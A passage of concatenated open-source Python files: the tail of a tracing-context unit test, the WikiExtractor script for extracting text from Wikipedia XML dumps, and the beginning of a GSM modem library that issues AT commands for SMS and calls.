assert "the trace has %d unfinished spans" not in msg
def test_thread_safe(self):
# the Context must be thread-safe
ctx = Context()
def _fill_ctx():
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
assert 100 == len(ctx._trace)
def test_clone(self):
ctx = Context()
ctx.sampling_priority = 2
# manually create a root-child trace
root = Span(tracer=None, name="root")
child = Span(tracer=None, name="child_1", trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
cloned_ctx = ctx.clone()
assert cloned_ctx._parent_trace_id == ctx._parent_trace_id
assert cloned_ctx._parent_span_id == ctx._parent_span_id
assert cloned_ctx._sampling_priority == ctx._sampling_priority
assert cloned_ctx.dd_origin == ctx.dd_origin
assert cloned_ctx._current_span == ctx._current_span
assert cloned_ctx._trace == []
|
WikiExtractor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Version: 3.0 (July 22, 2020)
# Author: Giuseppe Attardi (attardi@di.unipi.it), University of Pisa
#
# Contributors:
# Antonio Fuschetto (fuschett@aol.com)
# Leonardo Souza (lsouza@amtera.com.br)
# Juan Manuel Caicedo (juan@cavorite.com)
# Humberto Pereira (begini@gmail.com)
# Siegfried-A. Gevatter (siegfried@gevatter.com)
# Pedro Assis (pedroh2306@gmail.com)
# Wim Muskee (wimmuskee@gmail.com)
# Radics Geza (radicsge@gmail.com)
# Nick Ulven (nulven@github)
#
# =============================================================================
# Copyright (c) 2009-2020. Giuseppe Attardi (attardi@di.unipi.it).
# =============================================================================
# This file is part of Tanl.
#
# Tanl is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# Tanl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
"""Wikipedia Extractor:
Extracts and cleans text from a Wikipedia database dump and stores output in a
number of files of similar size in a given directory.
Each file will contain several documents in the format:
<doc id="" url="" title="">
...
</doc>
If the program is invoked with the --json flag, then each file will
contain several documents formatted as json ojects, one per line, with
the following structure
{"id": "", "revid": "", "url": "", "title": "", "text": "..."}
The program performs template expansion by preprocesssng the whole dump and
collecting template definitions.
"""
import argparse
import bz2
import logging
import os.path
import re # TODO use regex when it will be standard
import sys
from io import StringIO
from multiprocessing import Queue, get_context, cpu_count
from timeit import default_timer
from .extract import Extractor, ignoreTag, define_template, acceptedNamespaces
# ===========================================================================
# Program version
__version__ = '3.0.6'
##
# Defined in <siteinfo>
# We include as default Template, when loading external template file.
knownNamespaces = set(['Template'])
##
# The namespace used for template definitions
# It is the name associated with namespace key=10 in the siteinfo header.
templateNamespace = ''
templatePrefix = ''
##
# The namespace used for module definitions
# It is the name associated with namespace key=828 in the siteinfo header.
moduleNamespace = ''
# ----------------------------------------------------------------------
# Modules
# Only minimal support
# FIXME: import Lua modules.
modules = {
'convert': {
'convert': lambda x, u, *rest: x + ' ' + u, # no conversion
}
}
# ----------------------------------------------------------------------
# Expand using WikiMedia API
# import json
# def expandTemplates(text):
# """Expand templates invoking MediaWiki API"""
# text = urlib.urlencodew(text)
# base = urlbase[:urlbase.rfind('/')]
# url = base + "/w/api.php?action=expandtemplates&format=json&text=" + text
# exp = json.loads(urllib.urlopen(url))
# return exp['expandtemplates']['*']
# ------------------------------------------------------------------------------
# Output
class NextFile():
"""
Synchronous generation of next available file name.
"""
filesPerDir = 100
def __init__(self, path_name):
self.path_name = path_name
self.dir_index = -1
self.file_index = -1
def next(self):
self.file_index = (self.file_index + 1) % NextFile.filesPerDir
if self.file_index == 0:
self.dir_index += 1
dirname = self._dirname()
if not os.path.isdir(dirname):
os.makedirs(dirname)
return self._filepath()
def _dirname(self):
char1 = self.dir_index % 26
char2 = int(self.dir_index / 26) % 26
return os.path.join(self.path_name, '%c%c' % (ord('A') + char2, ord('A') + char1))
def _filepath(self):
return '%s/wiki_%02d' % (self._dirname(), self.file_index)
class OutputSplitter():
"""
File-like object, that splits output to multiple files of a given max size.
"""
def __init__(self, nextFile, max_file_size=0, compress=True):
"""
:param nextFile: a NextFile object from which to obtain filenames
to use.
:param max_file_size: the maximum size of each file.
:para compress: whether to write data with bzip compression.
"""
self.nextFile = nextFile
self.compress = compress
self.max_file_size = max_file_size
self.file = self.open(self.nextFile.next())
def reserve(self, size):
if self.file.tell() + size > self.max_file_size:
self.close()
self.file = self.open(self.nextFile.next())
def write(self, data):
self.reserve(len(data))
if self.compress:
self.file.write(data)
else:
self.file.write(data)
def close(self):
self.file.close()
def open(self, filename):
if self.compress:
return bz2.BZ2File(filename + '.bz2', 'w')
else:
return open(filename, 'w')
# ----------------------------------------------------------------------
# READER
tagRE = re.compile(r'(.*?)<(/?\w+)[^>]*>(?:([^<]*)(<.*?>)?)?')
# 1 2 3 4
def load_templates(file, output_file=None):
"""
Load templates from :param file:.
:param output_file: file where to save templates and modules.
"""
global templateNamespace, templatePrefix
templatePrefix = templateNamespace + ':'
global moduleNamespace, modulePrefix
modulePrefix = moduleNamespace + ':'
articles = 0
templates = 0
page = []
inText = False
if output_file:
output = open(output_file, 'w')
for line in file:
#line = line.decode('utf-8')
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
elif tag == 'title':
title = m.group(3)
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
if not output_file and not templateNamespace: # do not know it yet
# we reconstruct it from the first title
colon = title.find(':')
if colon > 1:
templateNamespace = title[:colon]
templatePrefix = title[:colon + 1]
# FIXME: should reconstruct also moduleNamespace
if title.startswith(templatePrefix):
define_template(title, page)
templates += 1
# save templates and modules to file
if output_file and (title.startswith(templatePrefix) or
title.startswith(modulePrefix)):
output.write('<page>\n')
output.write(' <title>%s</title>\n' % title)
output.write(' <ns>10</ns>\n')
output.write(' <text>')
for line in page:
output.write(line)
output.write(' </text>\n')
output.write('</page>\n')
page = []
articles += 1
if articles % 100000 == 0:
logging.info("Preprocessed %d pages", articles)
if output_file:
output.close()
logging.info("Saved %d templates to '%s'", templates, output_file)
return templates
def decode_open(filename, mode='rt', encoding='utf-8'):
"""
Open a file, decode and decompress, depending on extension `gz`, or 'bz2`.
:param filename: the file to open.
"""
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode, encoding=encoding)
elif ext == '.bz2':
return bz2.open(filename, mode=mode, encoding=encoding)
else:
return open(filename, mode, encoding=encoding)
def process_dump(input_file, template_file, out_file, file_size, file_compress,
process_count, html_safe):
"""
:param input_file: name of the wikipedia dump file; '-' to read from stdin
:param template_file: optional file with template definitions.
:param out_file: directory where to store extracted data, or '-' for stdout
:param file_size: max size of each extracted file, or None for no max (one file)
:param file_compress: whether to compress files with bzip.
:param process_count: number of extraction processes to spawn.
"""
global knownNamespaces
global templateNamespace, templatePrefix
global moduleNamespace, modulePrefix
urlbase = '' # This is obtained from <siteinfo>
input = decode_open(input_file)
# collect siteinfo
for line in input:
line = line #.decode('utf-8')
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'base':
# discover urlbase from the xml dump file
# /mediawiki/siteinfo/base
base = m.group(3)
urlbase = base[:base.rfind("/")]
elif tag == 'namespace':
knownNamespaces.add(m.group(3))
if re.search('key="10"', line):
templateNamespace = m.group(3)
templatePrefix = templateNamespace + ':'
elif re.search('key="828"', line):
moduleNamespace = m.group(3)
modulePrefix = moduleNamespace + ':'
elif tag == '/siteinfo':
break
if expand_templates:
# preprocess
template_load_start = default_timer()
if template_file and os.path.exists(template_file):
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", template_file)
file = decode_open(template_file)
templates = load_templates(file)
file.close()
else:
if input_file == '-':
# can't scan then reset stdin; must error w/ suggestion to specify template_file
raise ValueError("to use templates with stdin dump, must supply explicit template-file")
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", input_file)
templates = load_templates(input, template_file)
input.close()
input = decode_open(input_file)
template_load_elapsed = default_timer() - template_load_start
logging.info("Loaded %d templates in %.1fs", templates, template_load_elapsed)
if out_file == '-':
output = sys.stdout
if file_compress:
logging.warn("writing to stdout, so no output compression (use an external tool)")
else:
nextFile = NextFile(out_file)
output = OutputSplitter(nextFile, file_size, file_compress)
# process pages
logging.info("Starting page extraction from %s.", input_file)
extract_start = default_timer()
# Parallel Map/Reduce:
# - pages to be processed are dispatched to workers
# - a reduce process collects the results, sort them and print them.
# fixes MacOS error: TypeError: cannot pickle '_io.TextIOWrapper' object
Process = get_context("fork").Process
maxsize = 10 * process_count
# output queue
output_queue = Queue(maxsize=maxsize)
# Reduce job that sorts and prints output
reduce = Process(target=reduce_process, args=(output_queue, output))
reduce.start()
# initialize jobs queue
jobs_queue = Queue(maxsize=maxsize)
# start worker processes
logging.info("Using %d extract processes.", process_count)
workers = []
for _ in range(max(1, process_count)):
extractor = Process(target=extract_process,
args=(jobs_queue, output_queue, html_safe))
extractor.daemon = True # only live while parent process lives
extractor.start()
workers.append(extractor)
# Mapper process
# we collect individual lines, since str.join() is significantly faster
# than concatenation
page = []
id = ''
revid = ''
last_id = ''
ordinal = 0 # page count
inText = False
redirect = False
for line in input:
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
redirect = False
elif tag == 'id' and not id:
id = m.group(3)
elif tag == 'id' and id: # <revision> <id></id> </revision>
revid = m.group(3)
elif tag == 'title':
title = m.group(3)
elif tag == 'redirect':
redirect = True
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
colon = title.find(':')
if (colon < 0 or (title[:colon] in acceptedNamespaces) and id != last_id and
not redirect and not title.startswith(templateNamespace)):
job = (id, revid, urlbase, title, page, ordinal)
jobs_queue.put(job) # goes to any available extract_process
last_id = id
ordinal += 1
id = ''
revid = ''
page = []
input.close()
# signal termination
for _ in workers:
jobs_queue.put(None)
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
if output != sys.stdout:
output.close()
extract_duration = default_timer() - extract_start
extract_rate = ordinal / extract_duration
logging.info("Finished %d-process extraction of %d articles in %.1fs (%.1f art/s)",
process_count, ordinal, extract_duration, extract_rate)
# ----------------------------------------------------------------------
# Multiprocess support
def extract_process(jobs_queue, output_queue, html_safe):
"""Pull tuples of raw page content, do CPU/regex-heavy fixup, push finished text
:param jobs_queue: where to get jobs.
:param output_queue: where to queue extracted text for output.
:html_safe: whether to convert entities in text to HTML.
"""
while True:
job = jobs_queue.get() # job is (id, revid, urlbase, title, page, ordinal)
if job:
out = StringIO() # memory buffer
Extractor(*job[:-1]).extract(out, html_safe) # (id, urlbase, title, page)
text = out.getvalue()
output_queue.put((job[-1], text)) # (ordinal, extracted_text)
out.close()
else:
break
def reduce_process(output_queue, output):
"""Pull finished article text, write series of files (or stdout)
:param output_queue: text to be output.
:param output: file object where to print.
"""
interval_start = default_timer()
period = 100000
# FIXME: use a heap
ordering_buffer = {} # collected pages
next_ordinal = 0 # sequence number of pages
while True:
if next_ordinal in ordering_buffer:
output.write(ordering_buffer.pop(next_ordinal))
next_ordinal += 1
# progress report
if next_ordinal % period == 0:
interval_rate = period / (default_timer() - interval_start)
logging.info("Extracted %d articles (%.1f art/s)",
next_ordinal, interval_rate)
interval_start = default_timer()
else:
# mapper puts None to signal finish
pair = output_queue.get()
if not pair:
break
ordinal, text = pair
ordering_buffer[ordinal] = text
# ----------------------------------------------------------------------
# Minimum size of output files
minFileSize = 200 * 1024
def main():
global urlbase, acceptedNamespaces
global expand_templates, templateCache
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__)
parser.add_argument("input",
help="XML wiki dump file")
groupO = parser.add_argument_group('Output')
groupO.add_argument("-o", "--output", default="text",
help="directory for extracted files (or '-' for dumping to stdout)")
groupO.add_argument("-b", "--bytes", default="1M",
help="maximum bytes per output file (default %(default)s); 0 means to put a single article per file",
metavar="n[KMG]")
groupO.add_argument("-c", "--compress", action="store_true",
help="compress output files using bzip")
groupO.add_argument("--json", action="store_true",
help="write output in json format instead of the default <doc> format")
groupP = parser.add_argument_group('Processing')
groupP.add_argument("--html", action="store_true",
help="produce HTML output, subsumes --links")
groupP.add_argument("-l", "--links", action="store_true",
help="preserve links")
groupP.add_argument("-ns", "--namespaces", default="", metavar="ns1,ns2",
help="accepted namespaces")
groupP.add_argument("--templates",
help="use or create file containing templates")
groupP.add_argument("--no-templates", action="store_false",
help="Do not expand templates")
groupP.add_argument("--html-safe", default=True,
help="use to produce HTML safe output within <doc>...</doc>")
default_process_count = cpu_count() - 1
parser.add_argument("--processes", type=int, default=default_process_count,
help="Number of processes to use (default %(default)s)")
groupS = parser.add_argument_group('Special')
groupS.add_argument("-q", "--quiet", action="store_true",
help="suppress reporting progress info")
groupS.add_argument("--debug", action="store_true",
help="print debug info")
groupS.add_argument("-a", "--article", action="store_true",
help="analyze a file containing a single article (debug option)")
groupS.add_argument("-v", "--version", action="version",
version='%(prog)s ' + __version__,
help="print program version")
args = parser.parse_args()
Extractor.keepLinks = args.links
Extractor.HtmlFormatting = args.html
if args.html:
Extractor.keepLinks = True
Extractor.to_json = args.json
expand_templates = args.no_templates
try:
power = 'kmg'.find(args.bytes[-1].lower()) + 1
# 0 bytes means put a single article per file.
file_size = 0 if args.bytes == '0' else int(args.bytes[:-1]) * 1024 ** power
if file_size and file_size < minFileSize:
raise ValueError()
except ValueError:
logging.error('Insufficient or invalid size: %s', args.bytes)
return
if args.namespaces:
acceptedNamespaces = set(args.namespaces.split(','))
FORMAT = '%(levelname)s: %(message)s'
logging.basicConfig(format=FORMAT)
logger = logging.getLogger()
if not args.quiet:
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
input_file = args.input
if not Extractor.keepLinks:
ignoreTag('a')
# sharing cache of parser templates is too slow:
# manager = Manager()
# templateCache = manager.dict()
if args.article:
if args.templates:
if os.path.exists(args.templates):
with open(args.templates) as file:
load_templates(file)
with open(input_file) as file:
page = file.read()
ids = re.findall(r'<id>(\d*?)</id>', page)
id = ids[0] if ids else ''
revid = ids[1] if len(ids) > 1 else ''
m = re.search(r'<title>(.*?)</title>', page)
if m:
title = m.group(1)
else:
logging.error('Missing title element')
return
m = re.search(r'<base>(.*?)</base>', page)
if m:
base = m.group(1)
urlbase = base[:base.rfind("/")]
else:
urlbase = ''
Extractor(id, revid, urlbase, title, [page]).extract(sys.stdout)
return
output_path = args.output
if output_path != '-' and not os.path.isdir(output_path):
try:
os.makedirs(output_path)
except:
logging.error('Could not create: %s', output_path)
return
process_dump(input_file, args.templates, output_path, file_size,
args.compress, args.processes, args.html_safe)
if __name__ == '__main__':
main()
|
modem.py
|
#!/usr/bin/env python
""" High-level API classes for an attached GSM modem """
import sys, re, logging, weakref, time, threading, abc, codecs
from datetime import datetime
from .serial_comms import SerialComms
from .exceptions import CommandError, InvalidStateException, CmeError, CmsError, InterruptedException, TimeoutException, PinRequiredError, IncorrectPinError, SmscNumberUnknownError
from .pdu import encodeSmsSubmitPdu, decodeSmsPdu
from .util import SimpleOffsetTzInfo, lineStartingWith, allLinesMatchingPattern, parseTextModeTimeStr
from . import compat # For Python 2.6 compatibility
from .util import lineMatching
from .exceptions import EncodingError
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION >= 3:
xrange = range
dictValuesIter = dict.values
dictItemsIter = dict.items
else: #pragma: no cover
dictValuesIter = dict.itervalues
dictItemsIter = dict.iteritems
class Sms(object):
""" Abstract SMS message base class """
__metaclass__ = abc.ABCMeta
# Some constants to ease handling SMS statuses
STATUS_RECEIVED_UNREAD = 0
STATUS_RECEIVED_READ = 1
STATUS_STORED_UNSENT = 2
STATUS_STORED_SENT = 3
STATUS_ALL = 4
# ...and a handy converter for text mode statuses
TEXT_MODE_STATUS_MAP = {'REC UNREAD': STATUS_RECEIVED_UNREAD,
'REC READ': STATUS_RECEIVED_READ,
'STO UNSENT': STATUS_STORED_UNSENT,
'STO SENT': STATUS_STORED_SENT,
'ALL': STATUS_ALL}
def __init__(self, number, text, smsc=None):
self.number = number
self.text = text
self.smsc = smsc
class ReceivedSms(Sms):
""" An SMS message that has been received (MT) """
def __init__(self, gsmModem, status, number, time, text, smsc=None):
super(ReceivedSms, self).__init__(number, text, smsc)
self._gsmModem = weakref.proxy(gsmModem)
self.status = status
self.time = time
def reply(self, message):
""" Convenience method that sends a reply SMS to the sender of this message """
return self._gsmModem.sendSms(self.number, message)
class SentSms(Sms):
""" An SMS message that has been sent (MO) """
ENROUTE = 0 # Status indicating message is still enroute to destination
DELIVERED = 1 # Status indicating message has been received by destination handset
FAILED = 2 # Status indicating message delivery has failed
def __init__(self, number, text, reference, smsc=None):
super(SentSms, self).__init__(number, text, smsc)
self.report = None # Status report for this SMS (StatusReport object)
self.reference = reference
@property
def status(self):
""" Status of this SMS. Can be ENROUTE, DELIVERED or FAILED
The actual status report object may be accessed via the 'report' attribute
if status is 'DELIVERED' or 'FAILED'
"""
if self.report == None:
return SentSms.ENROUTE
else:
return SentSms.DELIVERED if self.report.deliveryStatus == StatusReport.DELIVERED else SentSms.FAILED
class StatusReport(Sms):
""" An SMS status/delivery report
Note: the 'status' attribute of this class refers to this status report SM's status (whether
it has been read, etc). To find the status of the message that caused this status report,
use the 'deliveryStatus' attribute.
"""
DELIVERED = 0 # SMS delivery status: delivery successful
FAILED = 68 # SMS delivery status: delivery failed
def __init__(self, gsmModem, status, reference, number, timeSent, timeFinalized, deliveryStatus, smsc=None):
super(StatusReport, self).__init__(number, None, smsc)
self._gsmModem = weakref.proxy(gsmModem)
self.status = status
self.reference = reference
self.timeSent = timeSent
self.timeFinalized = timeFinalized
self.deliveryStatus = deliveryStatus
class GsmModem(SerialComms):
""" Main class for interacting with an attached GSM modem """
log = logging.getLogger('gsmmodem.modem.GsmModem')
# Used for parsing AT command errors
CM_ERROR_REGEX = re.compile(r'^\+(CM[ES]) ERROR: (\d+)$')
# Used for parsing signal strength query responses
CSQ_REGEX = re.compile(r'^\+CSQ:\s*(\d+),')
# Used for parsing caller ID announcements for incoming calls. Group 1 is the number
CLIP_REGEX = re.compile(r'^\+CLIP:\s*"(\+{0,1}\d+)",(\d+).*$')
# Used for parsing new SMS message indications
CMTI_REGEX = re.compile(r'^\+CMTI:\s*"([^"]+)",(\d+)$')
# Used for parsing SMS message reads (text mode)
CMGR_SM_DELIVER_REGEX_TEXT = None
# Used for parsing SMS status report message reads (text mode)
CMGR_SM_REPORT_REGEXT_TEXT = None
# Used for parsing SMS message reads (PDU mode)
CMGR_REGEX_PDU = None
# Used for parsing USSD event notifications
CUSD_REGEX = re.compile(r'^\+CUSD:\s*(\d),"(.*)",(\d+)$', re.DOTALL)
# Used for parsing SMS status reports
CDSI_REGEX = re.compile(r'\+CDSI:\s*"([^"]+)",(\d+)$')
def __init__(self, port, baudrate=115200, incomingCallCallbackFunc=None, smsReceivedCallbackFunc=None, smsStatusReportCallback=None,custom_handler_callback=None):
super(GsmModem, self).__init__(port, baudrate, notifyCallbackFunc=self._handleModemNotification)
self.custom_handler_callback = custom_handler_callback or self._placeholderCallback
self.incomingCallCallback = incomingCallCallbackFunc or self._placeholderCallback
self.smsReceivedCallback = smsReceivedCallbackFunc or self._placeholderCallback
self.smsStatusReportCallback = smsStatusReportCallback or self._placeholderCallback
# Flag indicating whether caller ID for incoming call notification has been set up
self._callingLineIdentification = False
# Flag indicating whether incoming call notifications have extended information
self._extendedIncomingCallIndication = False
# Current active calls (ringing and/or answered), key is the unique call ID (not the remote number)
self.activeCalls = {}
# Dict containing sent SMS messages (for auto-tracking their delivery status)
self.sentSms = weakref.WeakValueDictionary()
self._ussdSessionEvent = None # threading.Event
self._ussdResponse = None # gsmmodem.modem.Ussd
self._smsStatusReportEvent = None # threading.Event
self._dialEvent = None # threading.Event
self._dialResponse = None # gsmmodem.modem.Call
self._waitForAtdResponse = True # Flag that controls if we should wait for an immediate response to ATD, or not
self._waitForCallInitUpdate = True # Flag that controls if we should wait for a ATD "call initiated" message
self._callStatusUpdates = [] # populated during connect() - contains regexes and handlers for detecting/handling call status updates
self._mustPollCallStatus = False # whether or not the modem must be polled for outgoing call status updates
self._pollCallStatusRegex = None # Regular expression used when polling outgoing call status
self._writeWait = 0 # Time (in seconds to wait after writing a command (adjusted when 515 errors are detected)
self._smsTextMode = False # Storage variable for the smsTextMode property
self._smscNumber = None # Default SMSC number
self._smsRef = 0 # Sent SMS reference counter
self._smsMemReadDelete = None # Preferred message storage memory for reads/deletes (<mem1> parameter used for +CPMS)
self._smsMemWrite = None # Preferred message storage memory for writes (<mem2> parameter used for +CPMS)
self._smsReadSupported = True # Whether or not reading SMS messages is supported via AT commands
def connect(self, reconnect=False,pin=None):
""" Opens the port and initializes the modem and SIM card
@param pin: The SIM card PIN code, if any
@type pin: str
@raise PinRequiredError: if the SIM card requires a PIN but none was provided
@raise IncorrectPinError: if the specified PIN is incorrect
"""
self.log.info('Connecting to modem on port %s at %dbps', self.port, self.baudrate)
if reconnect == False:
super(GsmModem, self).connect()
else:
if not self.alive:
super(GsmModem, self).connect()
self.write('AT+CFUN=1,1')
time.sleep(20)
# Send some initialization commands to the modem
try:
self.write('ATZ') # reset configuration
except CommandError:
# Some modems require a SIM PIN at this stage already; unlock it now
# Attempt to enable detailed error messages (to catch incorrect PIN error)
# but ignore if it fails
self.write('AT+CMEE=1', parseError=False)
self._unlockSim(pin)
pinCheckComplete = True
self.write('ATZ') # reset configuration
else:
pinCheckComplete = False
self.write('ATE0') # echo off
try:
cfun = int(lineStartingWith('+CFUN:', self.write('AT+CFUN?'))[7:]) # example response: +CFUN: 1
if cfun != 1:
self.write('AT+CFUN=1')
except CommandError:
pass # just ignore if the +CFUN command isn't supported
#test
#self.write('AT+RUI=1')
#self.write('AT+CEER?')
#self.write('AT+VGR?')
self.write('AT+CMEE=1') # enable detailed error messages (even if it has already been set - ATZ may reset this)
#if not pinCheckComplete:
#self._unlockSim(pin)
# Get list of supported commands from modem
commands = self.supportedCommands
# Device-specific settings
callUpdateTableHint = 2 # unknown modem
enableWind = False
if commands != None:
if '^CVOICE' in commands:
self.write('AT^CVOICE=0', parseError=False) # Enable voice calls
if '+VTS' in commands: # Check for DTMF sending support
Call.dtmfSupport = True
elif '^DTMF' in commands:
# Huawei modems use ^DTMF to send DTMF tones
callUpdateTableHint = 1 # Huawei
if '+WIND' in commands:
callUpdateTableHint = 2 # Wavecom
enableWind = True
elif '+ZPAS' in commands:
callUpdateTableHint = 3 # ZTE
else:
# Try to enable general notifications on Wavecom-like device
enableWind = True
if enableWind:
try:
wind = lineStartingWith('+WIND:', self.write('AT+WIND?')) # Check current WIND value; example response: +WIND: 63
except CommandError:
# Modem does not support +WIND notifications. See if we can detect other known call update notifications
pass
else:
# Enable notifications for call setup, hangup, etc
if int(wind[7:]) != 50:
self.write('AT+WIND=50')
callUpdateTableHint = 2 # Wavecom
# Attempt to identify modem type directly (if not already) - for outgoing call status updates
if callUpdateTableHint == 0:
if self.manufacturer.lower() == 'huawei':
callUpdateTableHint = 1 # huawei
else:
# See if this is a ZTE modem that has not yet been identified based on supported commands
try:
self.write('AT+ZPAS?')
except CommandError:
pass # Not a ZTE modem
else:
callUpdateTableHint = 3 # ZTE
# Load outgoing call status updates based on identified modem features
if callUpdateTableHint == 1:
# Use Hauwei's ^NOTIFICATIONs
self.log.info('Loading Huawei call state update table')
self._callStatusUpdates = ((re.compile(r'^\^ORIG:(\d),(\d)$'), self._handleCallInitiated),
(re.compile(r'^\^CONN:(\d),(\d)$'), self._handleCallAnswered),
(re.compile(r'^\^CEND:(\d),(\d),(\d)+,(\d)+$'), self._handleCallEnded))
self._mustPollCallStatus = False
# Huawei modems use ^DTMF to send DTMF tones; use that instead
Call.DTMF_COMMAND_BASE = '^DTMF={cid},'
Call.dtmfSupport = True
elif callUpdateTableHint == 2:
# Wavecom modem: +WIND notifications supported
self.log.info('Loading Wavecom call state update table')
self._callStatusUpdates = ((re.compile(r'^\+WIND: 5,(\d)$'), self._handleCallInitiated),
(re.compile(r'^OK$'), self._handleCallAnswered),
(re.compile(r'^\+WIND: 6,(\d)$'), self._handleCallEnded),
#custom
(re.compile(r'^\+WIND: 2$'), self.custom_handler_callback),
(re.compile(r'^\+WIND: 9$'), self.custom_handler_callback),
(re.compile(r'^NO CARRIER$'), self.custom_handler_callback),
(re.compile(r'^BUSY$'), self.custom_handler_callback),)
self._waitForAtdResponse = False # Wavecom modems return OK only when the call is answered
self._mustPollCallStatus = False
if commands == None: # older modem, assume it has standard DTMF support
Call.dtmfSupport = True
elif callUpdateTableHint == 3: # ZTE
# Use ZTE notifications ("CONNECT"/"HANGUP", but no "call initiated" notification)
self.log.info('Loading ZTE call state update table')
self._callStatusUpdates = ((re.compile(r'^CONNECT$'), self._handleCallAnswered),
(re.compile(r'^HANGUP:\s*(\d+)$'), self._handleCallEnded),
(re.compile(r'^OK$'), self._handleCallRejected))
self._waitForAtdResponse = False # ZTE modems do not return an immediate OK only when the call is answered
self._mustPollCallStatus = False
self._waitForCallInitUpdate = False # ZTE modems do not provide "call initiated" updates
if commands == None: # ZTE uses standard +VTS for DTMF
Call.dtmfSupport = True
else:
# Unknown modem - we do not know what its call updates look like. Use polling instead
self.log.info('Unknown/generic modem type - will use polling for call state updates')
self._mustPollCallStatus = True
self._pollCallStatusRegex = re.compile('^\+CLCC:\s+(\d+),(\d),(\d),(\d),([^,]),"([^,]*)",(\d+)$')
self._waitForAtdResponse = True # Most modems return OK immediately after issuing ATD
# General meta-information setup
self.write('AT+COPS=3,0', parseError=False) # Use long alphanumeric name format
# SMS setup
self.write('AT+CMGF={0}'.format(1 if self._smsTextMode else 0)) # Switch to text or PDU mode for SMS messages
self._compileSmsRegexes()
if self._smscNumber != None:
self.write('AT+CSCA="{0}"'.format(self._smscNumber)) # Set default SMSC number
currentSmscNumber = self._smscNumber
else:
currentSmscNumber = self.smsc
# Some modems delete the SMSC number when setting text-mode SMS parameters; preserve it if needed
if currentSmscNumber != None:
self._smscNumber = None # clear cache
self.write('AT+CSMP=49,167,0,0', parseError=False) # Enable delivery reports
# ...check SMSC again to ensure it did not change
if currentSmscNumber != None and self.smsc != currentSmscNumber:
self.smsc = currentSmscNumber
# Set message storage, but first check what the modem supports - example response: +CPMS: (("SM","BM","SR"),("SM"))
try:
cpmsLine = lineStartingWith('+CPMS', self.write('AT+CPMS=?'))
except CommandError:
# Modem does not support AT+CPMS; SMS reading unavailable
self._smsReadSupported = False
self.log.warning('SMS preferred message storage query not supported by modem. SMS reading unavailable.')
else:
cpmsSupport = cpmsLine.split(' ', 1)[1].split('),(')
# Do a sanity check on the memory types returned - Nokia S60 devices return empty strings, for example
for memItem in cpmsSupport:
if len(memItem) == 0:
# No support for reading stored SMS via AT commands - probably a Nokia S60
self._smsReadSupported = False
self.log.warning('Invalid SMS message storage support returned by modem. SMS reading unavailable. Response was: "%s"', cpmsLine)
break
else:
# Suppported memory types look fine, continue
preferredMemoryTypes = ('"ME"', '"SM"', '"SR"')
cpmsItems = [''] * len(cpmsSupport)
for i in xrange(len(cpmsSupport)):
for memType in preferredMemoryTypes:
if memType in cpmsSupport[i]:
if i == 0:
self._smsMemReadDelete = memType
cpmsItems[i] = memType
break
self.write('AT+CPMS={0}'.format(','.join(cpmsItems))) # Set message storage
del cpmsSupport
del cpmsLine
if self._smsReadSupported:
try:
self.write('AT+CNMI=2,1,0,2') # Set message notifications
except CommandError:
# Message notifications not supported
self._smsReadSupported = False
self.log.warning('Incoming SMS notifications not supported by modem. SMS receiving unavailable.')
# Incoming call notification setup
try:
self.write('AT+CLIP=1') # Enable calling line identification presentation
except CommandError as clipError:
self._callingLineIdentification = False
self.log.warning('Incoming call calling line identification (caller ID) not supported by modem. Error: {0}'.format(clipError))
else:
self._callingLineIdentification = True
try:
self.write('AT+CRC=1') # Enable extended format of incoming indication (optional)
except CommandError as crcError:
self._extendedIncomingCallIndication = False
self.log.warning('Extended format incoming call indication not supported by modem. Error: {0}'.format(crcError))
else:
self._extendedIncomingCallIndication = True
# Call control setup
self.write('AT+CVHU=0', parseError=False) # Enable call hang-up with ATH command (ignore if command not supported)
def _unlockSim(self, pin):
""" Unlocks the SIM card using the specified PIN (if necessary, else does nothing) """
# Unlock the SIM card if needed
if self.write('AT+CPIN?')[0] != '+CPIN: READY':
if pin != None:
self.write('AT+CPIN="{0}"'.format(pin))
else:
raise PinRequiredError('AT+CPIN')
def write(self, data, waitForResponse=True, timeout=5, parseError=True, writeTerm='\r', expectedResponseTermSeq=None):
""" Write data to the modem
This method adds the '\r\n' end-of-line sequence to the data parameter, and
writes it to the modem
@param data: Command/data to be written to the modem
@type data: str
@param waitForResponse: Whether this method should block and return the response from the modem or not
@type waitForResponse: bool
@param timeout: Maximum amount of time in seconds to wait for a response from the modem
@type timeout: int
